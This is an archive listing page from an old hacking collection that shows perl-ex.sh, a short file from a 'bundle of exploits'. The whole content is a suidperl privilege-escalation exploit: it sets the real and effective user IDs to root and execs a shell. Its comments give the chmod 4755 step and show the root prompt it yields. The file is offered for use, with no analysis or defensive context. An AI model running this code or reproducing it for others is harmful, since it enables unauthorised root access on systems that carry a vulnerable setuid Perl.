home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / perl-ex.sh < prev    next >
Text File  |  1998-07-17  |  110b  |  11 lines

  1. #!/usr/bin/suidperl -U
  2. $>=0; $<=0;
  3. exec ("/bin/sh");
  4.  
  5.  
  6.  
  7. #   $ chmod 4755 perl-ex.sh
  8. #   $ ./perl-ex.sh
  9. #   #
  10.  
  11.